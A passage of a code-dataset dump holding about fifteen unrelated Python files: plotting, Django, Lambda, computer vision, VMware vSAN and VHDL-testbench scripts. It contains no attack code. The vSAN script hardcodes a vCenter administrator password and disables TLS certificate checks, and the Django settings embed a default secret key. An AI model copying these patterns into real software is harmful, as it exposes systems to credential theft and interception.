plt.plot([-2.0*P.length, 2.0*P.length], [0, 0], 'b--')\n self.length = P.length\n self.width = P.width\n self.radius = P.radius\n self.w = P.w\n self.h = P.h\n \n \n def update(self, state):\n # Process inputs to function\n zt = state.item(0) # target\n zv = state.item(1) #Horizontal position \n h = state.item(2) #verticle position \n theta = state.item(3) # angle of arm, rad\n\n \n \n self.drawtarget(zt,h)\n self.drawbody(zv,h)\n self.drawwing1(zv,h,theta)\n self.drawwing2(zv,h,theta)\n self.drawarm1(zv,h,theta)\n self.drawarm2(zv,h,theta)\n self.ax.axis('equal')\n \n # Set initialization flag to False after first call\n if self.flag_init == True:\n self.flag_init = False\n\n#––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––\n \n def drawtarget(self, zt,h):\n # specify bottom left corner of rectangle\n x = zt-P.w/2.0\n y = 0\n corner = (x, y)\n # create rectangle on first call, update on subsequent calls\n if self.flag_init == True:\n # Create the Rectangle patch and append its handle\n # to the handle list\n self.handle.append(\n mpatches.Rectangle(corner, P.w, P.h,\n fc = 'red', ec = 'black'))\n # Add the patch to the axes\n self.ax.add_patch(self.handle[0])\n else:\n self.handle[0].set_xy(corner) # Update patch \n\n def drawbody(self, zv,h):\n # specify bottom left corner of rectangle\n x = zv-P.w/2.0\n y = h-P.h/2.0\n corner = (x, y)\n # create rectangle on first call, update on 
subsequent calls\n if self.flag_init == True:\n # Create the Rectangle patch and append its handle\n # to the handle list\n self.handle.append(\n mpatches.Rectangle(corner, P.w, P.h,\n fc = 'blue', ec = 'black'))\n # Add the patch to the axes\n self.ax.add_patch(self.handle[1])\n else:\n self.handle[1].set_xy(corner) # Update patch\n \n \n def drawwing1(self, zv,h,theta):\n # specify center of circle\n x = zv+((P.radius+P.d)*(np.sin(theta)))\n y = h+((P.radius+P.d)*(np.cos(theta)))\n center = (x,y)\n # create circle on first call, update on subsequent calls\n if self.flag_init == True:\n # Create the CirclePolygon patch and append its handle\n # to the handle list\n self.handle.append(\n mpatches.CirclePolygon(center, radius=P.radius,\n resolution=15, fc='limegreen', ec='black'))\n # Add the patch to the axes\n self.ax.add_patch(self.handle[2])\n else:\n self.handle[2]._xy = center\n\n def drawwing2(self, zv,h,theta):\n # specify center of circle\n x = zv-(P.radius+P.d)*np.sin(theta)\n y = h-(P.radius+P.d)*np.cos(theta)\n center = (x,y)\n # create circle on first call, update on subsequent calls\n if self.flag_init == True:\n # Create the CirclePolygon patch and append its handle\n # to the handle list\n self.handle.append(\n mpatches.CirclePolygon(center, radius=P.radius,\n resolution=15, fc='limegreen', ec='black'))\n # Add the patch to the axes\n self.ax.add_patch(self.handle[3])\n else:\n self.handle[3]._xy = center\n\n def drawarm1(self, zv,h,theta):\n # specify x-y points of the rod\n X = [zv, zv+P.d*np.sin(theta)]\n Y = [h, h+P.d*np.cos(theta)]\n # create rod on first call, update on subsequent calls\n if self.flag_init == True:\n # Create the line object and append its handle\n # to the handle list.\n line, =self.ax.plot(X, Y, lw=1, c='black')\n self.handle.append(line)\n else:\n self.handle[4].set_xdata(X)\n self.handle[4].set_ydata(Y)\n \n def drawarm2(self, zv,h,theta):\n # specify x-y points of the rod\n X = [zv, (zv-P.d*np.sin(theta))]\n Y = [h, (h-P.d*np.cos(theta))]\n # create rod on first call, update on subsequent calls\n if self.flag_init == True:\n # Create the line object and append its handle\n # to the handle list.\n line, =self.ax.plot(X, Y, lw=1, c='black')\n self.handle.append(line)\n else:\n self.handle[5].set_xdata(X)\n self.handle[5].set_ydata(Y)","sub_path":"Simulation model/hw2/vtolAnimation.py","file_name":"vtolAnimation.py","file_ext":"py","file_size_in_byte":5551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"89801748","text":"from django.shortcuts import render,get_object_or_404\nfrom django.template import loader\n# Create your views here.\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom .models import Question\nfrom django.urls import reverse\ndef index(request):\n latest_question_list = Question.objects.order_by('-pub_date')[:5]\n template = loader.get_template('poems/index.html')\n context = {\n 'latest_question_list': latest_question_list,\n }\n return HttpResponse(template.render(context, request))\ndef detail(request, question_id):\n question=get_object_or_404(Question,pk=question_id);\n return render(request, 'poems/detail.html', {'question': question})\ndef results(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n return render(request, 'poems/results.html', {'question': question})\ndef vote(request, question_id):\n question=get_object_or_404(Question,pk=question_id);\n try:\n selected_choice=question.choice_set.get(pk=request.POST['choice'])\n 
except (KeyError, question.choice_set.model.DoesNotExist): # Choice is not imported here, so reach its DoesNotExist via the related manager\n return render(request,'poems/detail.html',{\n 'question':question,\n 'error_message':\"You didn't select a choice.\",\n })\n else:\n selected_choice.votes += 1\n selected_choice.save()\n return HttpResponseRedirect(reverse('poem:results',args=(question_id,)))","sub_path":"pReader/poem/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"450261788","text":"\"\"\"This file overrides some base settings and adds new ones for local needs.\"\"\"\nfrom . base import * # noqa\nfrom . base import env\n\n\nDEBUG = True\n# ------------------------------------------------------------------------\n\nSECRET_KEY = env(\"DJANGO_SECRET_KEY\",\n default=\"sdklfgjLKklj1lkjJLLhilhHOIho098HhhoihggpPghpgh\")\n# ------------------------------------------------------------------------\n\n# A list of strings representing the host/domain names that this Django site can\n# serve. This is a security measure to prevent HTTP Host header attacks, which are\n# possible even with many seemingly-safe web server configurations.\n#\n# Default [] (Empty list).\n#\nALLOWED_HOSTS = [\"localhost\", \"127.0.0.1\", \"0.0.0.0\"]\n# ------------------------------------------------------------------------\n\n# A dictionary containing the settings for all caches to be used with Django.\n# It is a nested dictionary whose contents map cache aliases to a dictionary\n# containing the options for an individual cache.\n#\n# Default {\n# \"default\": {\n# \"BACKEND\": \"django.core.cache.backends.locmem.LocMemCache\",\n# }\n#\nCACHES = {\n \"default\": {\n \"BACKEND\": \"django.core.cache.backends.locmem.LocMemCache\",\n \"LOCATION\": \"\",\n }\n}\n# ------------------------------------------------------------------------\n\n# =================\n# django-debug-toolbar\n# =================\n\n# The Django Debug Toolbar is a configurable set of panels that display various\n# debug information about the current request/response.\n#\n# INSTALLED_APPS += [\"debug_toolbar\"] # noqa\n# ------------------------------------------------------------------------\n\n# MIDDLEWARE += [\"debug_toolbar.middleware.DebugToolbarMiddleware\"] # noqa\n# ------------------------------------------------------------------------\n\n# DEBUG_TOOLBAR_CONFIG = {\n# \"DISABLE_PANELS\": [\"debug_toolbar.panels.redirect.RedirectPanel\"],\n# \"SHOW_TEMPLATE_CONTEXT\": True,\n# }\n# ------------------------------------------------------------------------\n\n# INTERNAL_IPS = [\"127.0.0.1\", \"10.0.2.2\"]\n# ------------------------------------------------------------------------\n\n# =================\n# django-extensions\n# =================\n\n# A collection of custom extensions for the Django framework.\n# Includes management commands, additional database fields, admin extensions...\n#\nINSTALLED_APPS += [\"django_extensions\"] # noqa\n","sub_path":"Python/Django/Django(Controllers)/RequestAndResponseObjects/config/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"108582110","text":"from lambdas.services import ForceApi\nfrom lambdas.exceptions import InvalidArgument\n\n\ndef lambda_handler(event, context):\n \"\"\"\n refreshes an access token using a refresh token with Salesforce\n :param event: {\n 'refresh_token': your refresh token\n 'client_id': your app client id\n 'client_secret': your 
app client secret\n }\n :param context: lambda context\n :return: new access token\n \"\"\"\n if 'refresh_token' not in event:\n raise InvalidArgument('You need a refresh_token in this function.')\n if 'client_id' not in event:\n raise InvalidArgument('You need a client_id in this function.')\n if 'client_secret' not in event:\n raise InvalidArgument('You need a client_secret in this function.')\n\n api = ForceApi(event['client_id'], event['client_secret'])\n response = api.refresh_access_token(event['refresh_token'])\n if 'error' in response:\n return {\n 'error': response['error_description']\n }\n else:\n return response\n\n\n","sub_path":"lambdas/refresh_access_token.py","file_name":"refresh_access_token.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"434420565","text":"################################################################################\n\n# functionality: functions for multi-scale sliding window (exhaustive) search\n\n# This version: (c) 2018 Toby Breckon, Dept. Computer Science, Durham University, UK\n# License: MIT License\n\n# Origin acknowledgements: forked from https://github.com/siphomateke/PyBOW\n\n################################################################################\n\nimport numpy as np\nimport cv2\n\n################################################################################\n\n# re-size an image with respect to its aspect ratio if needed.\n# used in the multi-scale image pyramid approach\n\ndef resize_img(img, width=-1, height=-1):\n if height == -1 and width == -1:\n raise TypeError(\"Invalid arguments. Width or height must be provided.\")\n h = img.shape[0]\n w = img.shape[1]\n if height == -1:\n aspect_ratio = float(w) / h\n new_height = int(width / aspect_ratio)\n return cv2.resize(img, (width, new_height))\n elif width == -1:\n aspect_ratio = h / float(w)\n new_width = int(height / aspect_ratio)\n return cv2.resize(img, (new_width, height))\n\n################################################################################\n\n# a very basic approach to produce an image at multi-scales (i.e. 
variant\n# re-sized resolutions)\n\ndef pyramid(img, scale=1.5, min_size=(30, 30)):\n # yield the original image\n yield img\n\n # keep looping over the pyramid\n while True:\n # compute the new dimensions of the image and resize it\n w = int(img.shape[1] / scale)\n img = resize_img(img, width=w)\n\n # if the resized image does not meet the supplied minimum\n # size, then stop constructing the pyramid\n if img.shape[0] < min_size[1] or img.shape[1] < min_size[0]:\n break\n\n # yield the next image in the pyramid\n yield img\n\n################################################################################\n\n# generate a set of sliding window locations across the image\n\ndef sliding_window(image, window_size, step_size=8):\n # slide a window across the image\n for y in range(0, image.shape[0], step_size):\n for x in range(0, image.shape[1], step_size):\n # yield the current window\n window = image[y:y + window_size[1], x:x + window_size[0]]\n if not (window.shape[0] != window_size[1] or window.shape[1] != window_size[0]):\n yield (x, y, window)\n\n################################################################################\n\n# perform basic non-maximal suppression of overlapping object detections\n\ndef non_max_suppression_fast(boxes, overlapThresh):\n # if there are no boxes, return an empty list\n if len(boxes) == 0:\n return []\n\n # if the bounding boxes integers, convert them to floats --\n # this is important since we'll be doing a bunch of divisions\n if boxes.dtype.kind == \"i\":\n boxes = boxes.astype(\"float\")\n\n # initialize the list of picked indexes\n pick = []\n\n # grab the coordinates of the bounding boxes\n x1 = boxes[:, 0]\n y1 = boxes[:, 1]\n x2 = boxes[:, 2]\n y2 = boxes[:, 3]\n\n # compute the area of the bounding boxes and sort the bounding\n # boxes by the bottom-right y-coordinate of the bounding box\n area = (x2 - x1 + 1) * (y2 - y1 + 1)\n idxs = np.argsort(y2)\n\n # keep looping while some indexes still remain in the indexes\n # list\n while len(idxs) > 0:\n # grab the last index in the indexes list and add the\n # index value to the list of picked indexes\n last = len(idxs) - 1\n i = idxs[last]\n pick.append(i)\n\n # find the largest (x, y) coordinates for the start of\n # the bounding box and the smallest (x, y) coordinates\n # for the end of the bounding box\n xx1 = np.maximum(x1[i], x1[idxs[:last]])\n yy1 = np.maximum(y1[i], y1[idxs[:last]])\n xx2 = np.minimum(x2[i], x2[idxs[:last]])\n yy2 = np.minimum(y2[i], y2[idxs[:last]])\n\n # compute the width and height of the bounding box\n w = np.maximum(0, xx2 - xx1 + 1)\n h = np.maximum(0, yy2 - yy1 + 1)\n\n # compute the ratio of overlap\n overlap = (w * h) / area[idxs[:last]]\n\n # delete all indexes from the index list that have a significant overlap\n idxs = np.delete(idxs, np.concatenate(([last],\n np.where(overlap > overlapThresh)[0])))\n\n # return only the bounding boxes that were picked using the\n # integer data type\n return boxes[pick].astype(\"int\")\n\n################################################################################\n","sub_path":"sliding_window.py","file_name":"sliding_window.py","file_ext":"py","file_size_in_byte":4701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"387232024","text":"import lcra_gage_selenium as lcra\r\nimport pandas as pd\r\nimport numpy as np\r\nimport datetime\r\nimport os\r\n\r\n\r\ndef plot_travis_volume_since_1943(days_before_today=365):\r\n os.chdir(os.path.dirname(sys.argv[0]))\r\n # 
print(os.getcwd())\r\n df = pd.read_csv('Travis.08154500.1943-2018.csv', encoding='ISO-8859-1')\r\n df['Date'] = pd.to_datetime(df['Date'])\r\n df = df.set_index('Date')\r\n # date1 = '1943-01-01'\r\n # date2 = '2050-01-05'\r\n # date2 = '2050-12-31'\r\n date2 = datetime.date(year=2050, month=12, day=31)\r\n # get the difference in days between today and the last day in the csv read above (1/5/2018)\r\n dt_today = datetime.date.today()\r\n dt_last = datetime.date(year=2018, month=5, day=23)\r\n num_days = dt_today - dt_last\r\n # read elevation since 1/22/2018 and append to df\r\n x, y, full, header, latest_vals = lcra.import_gage_data(site_num='3963', full_level=681.0)\r\n # make a df\r\n df_new = pd.DataFrame({'Date': x, 'Level_ft': y}).set_index('Date')\r\n # df = df.append(df_new, ignore_index=True)\r\n df = df.append(df_new, ignore_index=False)\r\n # remove duplicate index rows\r\n df = df[~df.index.duplicated(keep='last')]\r\n # remove blank rows\r\n df = df.dropna(axis=0)\r\n # overwrite the source csv with updated data\r\n df.to_csv('Travis.08154500.1943-2018.csv')\r\n df = df.reset_index()\r\n # filter by date\r\n # get start date\r\n date1 = dt_today - datetime.timedelta(days=days_before_today)\r\n # print(str(date1) + ' to ' + str(dt_today))\r\n df = df[(df['Date'] >= pd.Timestamp(date1)) & (df['Date'] <= pd.Timestamp(date2))]\r\n # round to 2 decimals to match up with the stage-area-volume table\r\n df.Level_ft = df.Level_ft.round(2)\r\n x = df['Date'].values\r\n level_ft = df['Level_ft'].values\r\n header = 'Lake Travis (hydromet.lcra.org)'\r\n # read stage-storage\r\n df2 = pd.read_csv('stage.vol.travis.2dec.csv', encoding='ISO-8859-1')\r\n # chain together: merging the df's, setting the index to Date, and sorting by Date\r\n df3 = pd.merge(df, df2, left_on='Level_ft', right_on='ELEVATION').set_index('Date').sort_index()\r\n df3.to_csv('travis.csv', index=True)\r\n # pull out volume array and convert to % full\r\n pct_full = df3.VOL_ACFT.values / 1123478 * 100\r\n # make horizontal line at 100%\r\n pct100 = np.zeros(pct_full.shape[0]) + 100.0\r\n lcra.subplots(x, pct_full, header, 1, 1, latest_vals=None, full=pct100, show_axis_labels=True,\r\n ylabel='Percent Full (%)')\r\n lcra.plot()\r\n\r\n level100 = np.zeros(level_ft.shape[0]) + 681.0\r\n lcra.subplots(x, level_ft, header, 1, 1, latest_vals=latest_vals, full=level100, show_axis_labels=True,\r\n ylabel='Level (ft)')\r\n lcra.plot()\r\n\r\n\r\nif __name__ == '__main__':\r\n import sys\r\n\r\n if len(sys.argv) > 1:\r\n plot_travis_volume_since_1943(days_before_today=int(float(sys.argv[1])))\r\n else:\r\n try:\r\n dt_today = datetime.date.today()\r\n dt_first = datetime.date(year=1943, month=2, day=1)\r\n max_days = (dt_today - dt_first).days\r\n str_max_days = '\\nEnter number of days to plot (max={:,.0f}): '.format(max_days)\r\n numdays = int(float(input(str_max_days)))\r\n if numdays < 1:\r\n raise ValueError('You entered {}. 
Number must be positive.'.format(numdays))\r\n plot_travis_volume_since_1943(days_before_today=numdays)\r\n except Exception as e:\r\n print('\\n' + str(e) + '\\n')\r\n # using 'input' keeps the command window open so the user can view the error\r\n input('press enter to exit...')\r\n","sub_path":"Res.Volume.1943.LCRAgage.py","file_name":"Res.Volume.1943.LCRAgage.py","file_ext":"py","file_size_in_byte":3635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"131752922","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 29 23:36:46 2016\n\n@author: maurizio\n\"\"\"\n\nimport sys\nthis_path = '/home/maurizio/GitBook/Library/mau21710/gli-appunti/python/' # path \nsys.path.append(this_path)\n\nimport os.path\nimport subprocess\nfrom funAsciidoc import generate_simple_table\ntry:\n from funTTS import create_mp3\nexcept ImportError:\n print ('ImportError for create_mp3')\ntry:\n #from funBlender import create_scene\n from funBlender import put_images_on_sequencer\n from funBlender import put_sounds_on_sequencer\n pass\nexcept ImportError:\n print ('ImportError for create_scene and put_images_on_sequencer')\n\n\n\n\ndef _tested():\n title = 'Stretching'\n txt_commands = \"arco_plantare 20x2, gambe_posteriore 20x2, popliteo 20x2, adduttori 20x2, quadricipiti 20x2, anche 20x2, base_tronco_e_glutei 20, dorso 20, collo 20, pettorali 20x2, spalle 20x2, braccia 20x2\"\n base_path = '/home/maurizio/GitBook/Library/mau21710/gli-appunti' # path \n orig_imgs=\"figures/stretching/\"\n ext=\".png\"\n dest_ext=\".jpg\"\n out_dir = \"/tmp/aaa\"\n start_sound=\"/home/maurizio/Mao/Progetti/Suoni/gesso.mp3\"\n background_music=\"/home/maurizio/Downloads/Audio/relax-ben.mp3\"\n orig_svg_dir = os.path.join(base_path,\"figures\")\n lista_titoli = ['head_titles.svg', 'tail_titles.svg']\n lista_titoli_png = ['head_titles.png', 'tail_titles.png']\n dest_img_format = '960x720'\n lista_sostituzioni = [\n ['esteso', 'stretching post corsa'],\n #['mau21710', 'nome autore'],\n ['fitness', 'stretching'],\n ['Durata: 0 min', 'Durata: 30 min'],\n ['titolo_sequenza', 'Post Running'],\n ['thanks for watching!', 'grazie per l\\'attenzione'],\n ]\n absolute_orig_images = os.path.join(base_path,orig_imgs)\n if not os.path.exists(out_dir):\n subprocess.call(['mkdir', out_dir]) \n # ------------------------------ Generazione Header e Footer\n for l in lista_titoli:\n orig = os.path.join(orig_svg_dir, l)\n dest = os.path.join(out_dir,l)\n dest_png = os.path.join(absolute_orig_images,lista_titoli_png[lista_titoli.index(l)])\n if not os.path.exists(dest_png): #If already made no need to do it again!\n subprocess.call(['cp', orig, dest])\n f = open(dest,'r')\n all_svg=f.read()\n f.close()\n for l in lista_sostituzioni:\n all_svg = all_svg.replace(l[0],l[1])\n f = open(dest,'w')\n all_svg=f.write(all_svg)\n f.close() \n subprocess.call(['convert', '-scale', dest_img_format, dest, dest_png])\n # --------------------------------------------------------------------------- Genero Tabelle\n images, descs, secs, adoc_table = generate_simple_table(title, txt_commands, orig_imgs, ext)\n # ---------------------------------------------------------------------------- File Audio \n mp3_files = []\n tmp = os.path.join(out_dir,'tmp.mp3')\n for i in range(len(descs)):\n mp3_name=os.path.join(out_dir, \"{:03d}_{}.mp3\".format(i,images[i]))\n mp3_files.append(mp3_name)\n if not os.path.exists(mp3_name): #If already made no need to do it again!\n create_mp3(descs[i],mp3_name)\n 
subprocess.call(['sox', start_sound, mp3_name, tmp])\n subprocess.call(['mv', tmp, mp3_name])\n mp3_files.append(start_sound)\n mp3_files.append(start_sound)\n mp3_files.append(background_music)\n # ----------------------------------- Generazione lista files grafici\n imagefile_names = [lista_titoli_png[0]]\n for i in images:\n imagefile_names.append(\"{}{}\".format(i,ext))\n imagefile_names.append(lista_titoli_png[1])\n secs_full = [10]\n secs_full.extend(secs)\n secs_full.append(10)\n #-------------------------------------- genero i trunk video\n converted_images=[]\n for img in imagefile_names:\n new_name = os.path.join(out_dir,os.path.basename(img)).replace(ext, dest_ext)\n if not os.path.exists(new_name):\n subprocess.call(['convert', '-transparent-color', 'white', \n '-flatten' , '-scale', \n dest_img_format, os.path.join(absolute_orig_images,img), \n new_name])\n converted_images.append(new_name)\n put_images_on_sequencer(converted_images,\"\",secs_full)\n put_sounds_on_sequencer(mp3_files,\"\",secs_full)\n \n\nif __name__ == \"__main__\":\n _tested()\n pass\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n\n","sub_path":"_site/python/genera_stretching.py","file_name":"genera_stretching.py","file_ext":"py","file_size_in_byte":4778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"399019038","text":"\"\"\"empty message\n\nRevision ID: fdb1ed08ff70\nRevises: 641fa5fba3e1\nCreate Date: 2021-11-03 10:36:30.408197\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'fdb1ed08ff70'\ndown_revision = '641fa5fba3e1'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('todolists', sa.Column('completed', sa.Boolean(), nullable=False))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_column('todolists', 'completed')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/fdb1ed08ff70_.py","file_name":"fdb1ed08ff70_.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"448301762","text":"from __future__ import unicode_literals\nfrom django.db import models\n\nclass ShowManager(models.Manager):\n def basic_validator(self, postData):\n errors = {}\n # Setting length requirements\n if len(postData['title']) < 2:\n errors[\"show_title\"] = \"Title should be at least 2 caracters\"\n if len(postData['network']) < 3:\n errors[\"network\"] = \"Network name shoud be at least 3 caracter\"\n if len(postData['decription']) < 10:\n errors[\"decription\"] = \"Descriptions should be al least 10 characters\"\n return errors\n# creating the table\nclass Shows(models.Model):\n title = models.CharField(max_length=255)\n network = models.CharField(max_length=255)\n release_date = models.DateField(null=True)\n decription = models.TextField(null=True)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n objects = ShowManager()\n\n def __repr__(self):\n return f\" str:\n list_of_days = [\n \"Saturday\",\n \"Sunday\",\n \"Monday\",\n \"Tuesday\",\n \"Wednesday\",\n \"Thursday\",\n \"Friday\",\n ]\n if month == 1 or month == 2:\n year = year - 1\n month = month + 12\n y = year % 100\n c = year // 100\n weekday = int((day + 13 * (month + 1) // 5 + y + y // 4 + c // 4 + 5 * c) % 7)\n required_day = list_of_days[weekday]\n return required_day\n","sub_path":"code/ch17/17.3.2.dayOfTheWeek.py","file_name":"17.3.2.dayOfTheWeek.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"500088828","text":"from pyVim.connect import SmartConnect, Disconnect\nfrom pyVmomi import Cache\nimport ssl\nimport atexit\nfrom pyVmomi import vim\n# import the VSAN API python bindings\n\n#import the vSAN API python bindings\n\nimport vsanmgmtObjects\nimport vsanapiutils\n\ns = ssl.SSLContext(ssl.PROTOCOL_TLSv1)\ns.verify_mode = ssl.CERT_NONE\n\n# connection string to connect to vCenter\n\nsc = SmartConnect(host='10.27.44.44', user='Administrator@vsphere.local', pwd='VMware123!', sslContext=s)\n\n# Datacenter Level\n\ndc = sc.content.rootFolder.childEntity[0]\n\n\n\n\n\n# Find by Child Method to retrive hosts\n# retrieves all the hosts from the DC\n\nhosts = sc.content.rootFolder.childEntity[0].hostFolder.childEntity[0].host\n\nprint(hosts)\nprint(hosts[0])\n\nprint(hosts[0].configManager.advancedOption)\n\nadvsetting = hosts[0].configManager.advancedOption.setting\n\n# setting is type array\n\n# Loop over all the settings and look for vSAN CLomd Repair Time\n\n\n\n\n\nfor i in advsetting:\n\n if i.key == \"VSAN.ClomRepairDelay\":\n\n print(i.key)\n print(i.value)\n print(sc.content.rootFolder.childEntity[0].hostFolder.childEntity[0].host[0].configManager.advancedOption.QueryOptions('VSAN.ClomRepairDelay'))\n repair = sc.content.rootFolder.childEntity[0].hostFolder.childEntity[0].host[0].configManager.advancedOption.QueryOptions('VSAN.ClomRepairDelay')\n\n changedValue = repair[0]\n changedValue.key = 'VSAN.ClomRepairDelay'\n changedValue.value = '120'\n bn = vim.option.OptionValue(key='VSAN.ClomRepairDelay', value=120)\n print(bn)\n\n\n# creio que tenho erro devido a estar dentro do loop\n# TypeError: 'vim.option.OptionValue'\n# object is not iterable\n# 
rever isto\n\n sc.content.rootFolder.childEntity[0].hostFolder.childEntity[0].host[0].configManager.advancedOption.UpdateOptions(bn)\n\n\n\natexit.register(Disconnect, sc)\n","sub_path":"vSAN-Change-Adv-Settings.py","file_name":"vSAN-Change-Adv-Settings.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"644682894","text":"import sys\nfrom os import path\nfrom PIL import Image, ImageDraw\n\n# Endereco da imagem\nimagem = sys.argv[1]\n\n# Abre a imagem original em modo tons de cinza\norigem = Image.open(imagem).convert('L')\n\n# Cria a imagem a ser erodida\nerodida = Image.new('L', (origem.width, origem.height))\nerodidaDraw = ImageDraw.Draw(erodida)\n\nestruturante = (\n (0, 255, 0),\n (255, 255, 255),\n (0, 255, 0)\n)\n\n# Efetua erosao na imagem original a partir do elemento estruturante\nfor x in range(1, origem.width - 1):\n for y in range(1, origem.height - 1):\n centro = origem.getpixel((x, y))\n\n if centro != estruturante[1][1]:\n continue\n\n if \\\n (origem.getpixel((x - 1, y - 1)) == estruturante[0][0] or estruturante[0][0] == 0) and \\\n (origem.getpixel((x, y - 1)) == estruturante[0][1] or estruturante[0][1] == 0) and \\\n (origem.getpixel((x + 1, y - 1)) == estruturante[0][2] or estruturante[0][2] == 0) and \\\n (origem.getpixel((x - 1, y)) == estruturante[1][0] or estruturante[1][0] == 0) and \\\n (origem.getpixel((x + 1, y)) == estruturante[1][2] or estruturante[1][2] == 0) and \\\n (origem.getpixel((x - 1, y + 1)) == estruturante[2][0] or estruturante[2][0] == 0) and \\\n (origem.getpixel((x, y + 1)) == estruturante[2][1] or estruturante[2][1] == 0) and \\\n (origem.getpixel((x + 1, y + 1)) == estruturante[2][2] or estruturante[2][2] == 0):\n erodidaDraw.point((x, y), 255)\n\n# Cria a imagem de destino\ndestino = Image.new('L', (origem.width, origem.height))\ndestinoDraw = ImageDraw.Draw(destino)\n\n# Efetua a diferenca de conjuntos entre a imagem original e a imagem erodida\nfor x in range(origem.width):\n for y in range(origem.height):\n if origem.getpixel((x, y)) == 255 and erodida.getpixel((x, y)) == 0:\n destinoDraw.point((x, y), 255)\n else:\n destinoDraw.point((x, y), 0)\n\n# Salva a imagem\nnome, ext = path.splitext(imagem)\ndestino.save(nome + '_contorno' + ext)\n","sub_path":"ExtracaoContorno.py","file_name":"ExtracaoContorno.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"34093831","text":"def read_file(filename):\r\n lines=[]\r\n with open(filename , \"r\" , encoding=\"utf-8-sig\") as f:\r\n for line in f:\r\n lines.append(line.strip())\r\n return lines\r\n\r\ndef convert(lines):\r\n new = []\r\n person = None\r\n chien_word_count = 0\r\n china_word_count = 0\r\n for line in lines: \r\n s = line.split(\" \")\r\n time = s[0]\r\n name = s[1]\r\n if name == \"孟淳\":\r\n for msg in s[2:]:\r\n china_word_count += len(msg)\r\n elif name == \"孟謙\":\r\n for msg in s[2:]:\r\n chien_word_count += len(msg)\r\n print(s)\r\n print(\"孟淳說了\",china_word_count,\"個字\")\r\n print(\"孟謙說了\",chien_word_count,\"個字\")\r\n # return new\r\n\r\n\r\ndef write_file(filename , lines):\r\n with open(filename , \"w\" ) as f:\r\n for line in lines:\r\n f.write(line + \"\\n\")\r\n\r\ndef main():\r\n lines = read_file(\"[LINE]孟淳.txt\")\r\n lines = convert(lines)\r\n # write_file(\"output.txt\", 
lines)\r\n\r\nmain()\r\n","sub_path":"line.chat.py","file_name":"line.chat.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"310150313","text":"class TestBench_efpm_point_multiplier(TB_aluEC_prime_ext):\n\n def add_point_multiplication(self, dp, P, n, R):\n self.add_action( \"func(\" + dp.ec2_point_to_vhdl_string(P) + \", -- P\" )\n self.add_action( \" \" + dp.Fp_element_to_vhdl_string(n) + \", -- n\" )\n self.add_action( \" \" + dp.ec2_point_to_vhdl_string(R) + \"); -- R\" )\n\n def __init__(self, dp, entity):\n TB_aluEC_prime_ext.__init__(self, dp, entity)\n # Build port\n self.add_port( \"ecP: in ec2_point\" )\n self.add_port( \"n: in std_logic_vector(c_P'range)\" )\n self.add_port( \"ecR: out ec2_point\" )\n # Build signal\n self.add_signal( \"signal ecP_sti: ec2_point := EC2_POINT_I\" )\n self.add_signal( \"signal n_sti: std_logic_vector(c_P'range) := (others =>'0')\" )\n self.add_signal( \"signal ecR_obs: ec2_point := EC2_POINT_I\" )\n # Build port map\n self.add_port_map( \"ecP => ecP_sti\" )\n self.add_port_map( \"n => n_sti\" )\n self.add_port_map( \"ecR => ecR_obs\" )\n # Build signal driving\n self.add_drive( \"ecP_sti <= ecP;\" )\n self.add_drive( \"n_sti <= n;\" )\n # Build function parameters\n self.add_func_param( \"ecP : ec2_point\" )\n self.add_func_param( \"n: std_logic_vector(c_P'range)\" )\n self.add_func_param( \"ecR : ec2_point\" )\n # Build compare\n self.add_compare( \"if (ecR_obs.ii /= ecR.ii or (ecR.ii = '0' and (ecR_obs.x /= ecR.x or ecR_obs.y /= ecR.y ))) then\" )\n self.add_compare( \" logger.log_error( LF &\" )\n self.add_compare( \" \\\"Error: transaction number \\\" & integer'image(op_count) & \\\" on\\\" & \\\"
